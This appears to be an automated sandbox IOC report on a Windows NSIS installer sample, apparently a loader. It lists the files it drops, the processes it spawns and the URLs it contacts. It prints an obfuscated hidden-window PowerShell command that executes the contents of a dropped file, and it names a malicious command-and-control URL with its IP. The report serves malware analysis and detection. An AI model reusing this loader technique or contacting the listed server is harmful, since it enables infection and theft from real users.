IOC Report
RFQ-SulselBarruII2-COALCOMMLDOC.exe

loading gif

Files

File Path
Type
Category
Malicious
RFQ-SulselBarruII2-COALCOMMLDOC.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\RFQ-SulselBarruII2-COALCOMMLDOC.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmeringued.Brd
ASCII text, with very long lines (61450), with no line terminators
dropped
malicious
C:\Program Files (x86)\Common Files\ukases.lnk
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nsjlhnjp.qwc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qr5yvafi.dw1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Behandlingsmaal.sac
data
dropped
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Kliniklokalernes.sun
data
dropped
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Potatory.rea
FoxPro FPT, blocks size 16640, next free block index 173, field type 0
dropped
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\RFQ-SulselBarruII2-COALCOMMLDOC.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Reluktansernes.Ove71
data
dropped
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\teda.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\188E93\31437F.lck
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06
data
dropped
There are 5 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe
"C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Harish116=Get-Content 'C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmeringued.Brd';$Omkldningsrums=$Harish116.SubString(61425,3);.$Omkldningsrums($Harish116)"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
malicious
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
malicious
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
malicious
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
malicious
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
There are 9 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://ebnsina.top/project/five/fre.php
104.21.13.124
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://www.google.com
unknown
http://nuget.org/NuGet.exe
unknown
https://aka.ms/pscore6lB
unknown
http://crl.microsoft
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://drive.google.com/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.usercontent.google.com/
unknown
https://apis.google.com
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown